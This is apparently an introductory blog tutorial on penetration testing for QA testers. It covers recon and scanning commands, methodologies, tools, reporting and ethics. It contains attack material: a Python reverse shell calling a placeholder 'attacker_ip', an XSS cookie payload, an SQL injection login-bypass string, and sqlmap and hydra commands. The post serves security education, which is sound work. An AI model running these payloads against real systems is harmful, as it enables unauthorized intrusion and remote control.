Penetration Testing Basics for QA Testers

Penetration (as discussed in Security Testing for QA: A Practical Guide) testing (pentesting) is a simulated cyber attack against your system to identify exploitable vulnerabilities. For QA professionals, understanding pentesting fundamentals enhances security (as discussed in OWASP ZAP Automation: Security Scanning in CI/CD) testing capabilities and helps identify critical vulnerabilities before attackers do.

Penetration Testing Phases

1. Reconnaissance (Information Gathering)

Passive Reconnaissance:

# WHOIS lookup
whois example.com

# DNS enumeration
dig example.com ANY
nslookup example.com

# Search engine reconnaissance
site:example.com
inurl:admin site:example.com

Active Reconnaissance:

# Port scanning
nmap -sV -p- example.com

# Service detection
nmap -sC -sV example.com

# OS detection
nmap -O example.com

2. Scanning and Enumeration

# Network scanning
nmap -sn 192.168.1.0/24

# Vulnerability scanning
nmap --script vuln example.com

# Web application scanning
nikto -h https://example.com

# Directory enumeration
gobuster dir -u https://example.com -w /usr/share/wordlists/common.txt

3. Gaining Access (Exploitation)

SQL Injection:

sqlmap -u "http://example.com/product?id=1" --batch --dbs

XSS Testing:

<script>alert(document.cookie)</script>

Authentication Bypass:

# Brute force
hydra -l admin -P passwords.txt example.com http-post-form

4. Maintaining Access

Backdoor Creation (Educational):

# Reverse shell (for authorized testing only)
import socket, subprocess

s = socket.socket()
s.connect(("attacker_ip", 4444))
subprocess.call(["/bin/sh", "-i"], stdin=s.fileno(), stdout=s.fileno())

5. Covering Tracks

Clear logs
Remove backdoors
Document all activities

Testing Methodologies

OWASP Testing Guide

web_application_testing:
  information_gathering:
    - fingerprint_web_server
    - review_meta_files
    - enumerate_applications
    - identify_entry_points

  configuration_testing:
    - test_network_infrastructure
    - test_application_platform
    - test_file_extensions
    - test_backup_files

  authentication_testing:
    - test_credentials_transport
    - test_default_credentials
    - test_password_policy
    - test_account_lockout

PTES (Penetration Testing Execution Standard)

ptes_phases:
  pre_engagement:
    - scope_definition
    - rules_of_engagement
    - authorization

  intelligence_gathering:
    - passive_recon
    - active_recon
    - human_intelligence

  threat_modeling:
    - business_asset_analysis
    - threat_capability_analysis
    - attack_surface_analysis

Essential Tools

Tool	Category	Purpose
Nmap	Network Scanner	Port and service discovery
Burp Suite	Web Proxy	Intercepting and modifying requests
Metasploit	Exploitation	Exploit development and execution
Wireshark	Network Analyzer	Packet capture and analysis
Nikto	Web Scanner	Web server vulnerability scanning
John the Ripper	Password Cracker	Password security testing
Aircrack-ng	Wireless	WiFi security testing
SQLMap	Database	SQL injection testing

Practical Examples

Web Application Pentest

# 1. Reconnaissance
nmap -sV example.com

# 2. Web server fingerprinting
whatweb https://example.com

# 3. Directory discovery
dirb https://example.com

# 4. Vulnerability scanning
nikto -h https://example.com

# 5. SQL (as discussed in [SQL Injection and XSS: Finding Vulnerabilities](/blog/sql-injection-xss)) injection testing
sqlmap -u "https://example.com/search?q=test"

# 6. XSS testing
# Manual payloads in search fields, forms

Network Pentest

# 1. Network discovery
nmap -sn 192.168.1.0/24

# 2. Port scanning
nmap -p- -T4 192.168.1.100

# 3. Service enumeration
nmap -sC -sV 192.168.1.100

# 4. Vulnerability assessment
nmap --script vuln 192.168.1.100

# 5. Exploitation
# Use Metasploit or manual exploit

Reporting

Executive Summary

## Penetration Test Summary

**Test Date:** 2025-10-03
**Tester:** QA Security Team
**Scope:** example.com web application

### Findings Overview
- **Critical:** 2
- **High:** 5
- **Medium:** 8
- **Low:** 12

### Key Risks
1. SQL Injection in login form (Critical)
2. Stored XSS in comments (Critical)
3. Weak password policy (High)

Technical Findings

finding_001:
  title: "SQL Injection in Authentication"
  severity: CRITICAL
  cvss_score: 9.8

  description: |
    The login form is vulnerable to SQL injection,
    allowing authentication bypass.

  steps_to_reproduce:
    1. Navigate to /login
    2. Enter username: admin' OR '1'='1
    3. Enter any password
    4. Click login

  impact:
    - Complete authentication bypass
    - Unauthorized access to admin panel
    - Potential data breach

  remediation:
    - Use parameterized queries
    - Implement input validation
    - Add WAF rules

  evidence:
    - screenshot_1.png
    - request_response.txt

Ethical Considerations

Legal Requirements

authorization_checklist:
  - [ ] Written permission obtained
  - [ ] Scope clearly defined
  - [ ] Rules of engagement documented
  - [ ] Emergency contact established
  - [ ] Non-disclosure agreement signed
  - [ ] Insurance verified

Best Practices

Always Get Authorization: Never test without explicit permission
Define Scope: Test only authorized systems
Document Everything: Keep detailed logs
Report Responsibly: Follow disclosure protocols
Avoid Damage: Don’t disrupt production systems

Conclusion

Penetration testing is a critical skill for security-focused QA professionals. Understanding pentesting methodologies, tools, and ethical considerations enables QA teams to identify and help remediate vulnerabilities before they can be exploited maliciously.

Key Takeaways:

Follow structured methodologies (OWASP, PTES)
Use appropriate tools for each phase
Always obtain proper authorization
Document findings thoroughly
Report vulnerabilities responsibly
Continuously update skills and knowledge

Remember: The goal is to improve security, not exploit it. Always conduct pentesting ethically and legally.